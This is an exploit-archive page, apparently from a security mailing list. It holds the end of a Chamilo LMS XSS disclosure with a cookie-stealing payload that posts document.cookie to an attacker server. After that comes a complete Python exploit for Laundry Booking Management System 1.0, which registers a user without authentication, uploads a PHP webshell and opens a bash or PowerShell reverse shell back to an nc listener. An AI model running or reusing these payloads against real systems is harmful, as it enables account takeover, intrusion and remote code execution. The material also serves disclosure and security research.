/>https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities<br /><br />Affected parameter: send private message - text field<br />Payload: <img src=x onerror=this.src='<br />http://yourserver/?c='+document.cookie><br /><br /><br />Steps to reproduce:<br /> 1. Navigate to the social network menu<br /> 2. Select the victim profile<br /> 3. Add the payload on the text field<br /> 4. Submit the request and wait for the payload execution<br /><br />*Impact:* By using this vulnerability, an unprivileged user can steal<br />cookies from an admin account or force the administrator to create an<br />account with admin privileges with an HTTP 302 redirect.<br />*Mitigation*: Update the Chamilo to the latest version.<br />*Fix*:<br />https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8<br /><br /><br /><br /><br />Com os meus melhores cumprimentos,<br />--<br />*Pedro Tavares*<br />Founder and Editor-in-Chief at seguranca-informatica.pt<br />Co-founder of CSIRT.UBI<br />Creator of 0xSI_f33d <https://feed.seguranca-informatica.pt/><br /><br /><br /><br />seguranca-informatica.pt | @sirpedrotavares<br /><https://twitter.com/sirpedrotavares> | 0xSI_f33d<br /><https://feed.seguranca-informatica.pt/><br /><br /></code></pre>
<pre><code># Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE)<br /># Date: 29/11/2021<br /># Exploit Author: Pablo Santiago<br /># Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip<br /># Version: 1.0<br /># Tested on: Windows 7 and Ubuntu 21.10<br /><br /># Vulnerability: Its possible create an user without being authenticated,<br /># in this request you can upload a simple webshell which will used to get a<br /># reverse shell<br /><br />import re, sys, argparse, requests, time, os<br />import subprocess, pyfiglet<br /><br />ascii_banner = pyfiglet.figlet_format("Laundry")<br />print(ascii_banner)<br />print(" Booking Management System\n")<br />print("----[Broken Access Control to RCE]----\n")<br /><br /><br />class Exploit:<br /><br /> def __init__(self,target, shell_name,localhost,localport,os):<br /><br /> self.target=target<br /> self.shell_name=shell_name<br /> self.localhost=localhost<br /> self.localport=localport<br /> self.LHL= '/'.join([localhost,localport])<br /> self.HPW= "'"+localhost+"'"+','+localport<br /> self.os=os<br /> self.session = requests.Session()<br /> #self.http_proxy = "http://127.0.0.1:8080"<br /> #self.https_proxy = "https://127.0.0.1:8080"<br /> #self.proxies = {"http" : self.http_proxy,<br /> # "https" : self.https_proxy}<br /><br /> self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'}<br /><br /> def create_user(self):<br /><br /> url = self.target+"/pages/save_user.php"<br /> data = {<br /> "fname":"bypass",<br /> "email":"bypass@bypass.com",<br /> "password":"password",<br /> "group_id": "2",<br /><br /> }<br /><br /> #Creates user "bypass" and upload a simple webshell without<br />authentication<br /> request = self.session.post(url,<br />data=data,headers=self.headers,files={"image":(self.shell_name<br />+'.php',"<?=`$_GET[cmd]`?>")})<br /> time.sleep(3)<br /> if (request.status_code == 200):<br /> print('[*] The user and webshell were created\n')<br /> else:<br /> print('Something was wront...!')<br /><br /> def execute_shell(self):<br /> if self.os == "linux":<br /> time.sleep(3)<br /> print("[*] Starting reverse shell\n")<br /> subprocess.Popen(["nc","-nvlp", self.localport])<br /> time.sleep(3)<br /><br /> #Use a payload in bash to get a reverse shell<br /> payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'<br /> execute_command =<br />self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload<br /><br /> try:<br /> request_rce = requests.get(execute_command)<br /> print(request_rce.text)<br /><br /> except requests.exceptions.ReadTimeout:<br /> pass<br /><br /> elif self.os == "windows":<br /> time.sleep(3)<br /> print("[*] Starting reverse shell\n")<br /> subprocess.Popen(["nc","-nvlp", self.localport])<br /> time.sleep(3)<br /><br /> #Use a payload in powershell to get a reverse shell<br /> payload =<br />"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)<br />{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""<br /> execute_command =<br />self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload<br /><br /><br /> try:<br /> request_rce = requests.get(execute_command)<br /> print(request_rce.text)<br /><br /> except requests.exceptions.ReadTimeout:<br /> pass<br /><br /> else:<br /> print('Windows or linux')<br /><br /><br />def get_args():<br /> parser = argparse.ArgumentParser(description='Laundry Booking<br />Management System')<br /> parser.add_argument('-t', '--target', dest="target", required=True,<br />action='store', help='Target url')<br /> parser.add_argument('-s', '--shell_name', dest="shell_name",<br />required=True, action='store', help='shell_name')<br /> parser.add_argument('-l', '--localhost', dest="localhost",<br />required=True, action='store', help='local host')<br /> parser.add_argument('-p', '--localport', dest="localport",<br />required=True, action='store', help='local port')<br /> parser.add_argument('-os', '--os', choices=['linux', 'windows'],<br />dest="os", required=True, action='store', help='linux,windows')<br /> args = parser.parse_args()<br /> return args<br /><br />args = get_args()<br />target = args.target<br />shell_name = args.shell_name<br />localhost = args.localhost<br />localport = args.localport<br /><br /><br />xp = Exploit(target, shell_name,localhost,localport,args.os)<br />xp.create_user()<br />xp.execute_shell()<br /><br />#Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows<br />#Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux<br /> <br /><br /></code></pre>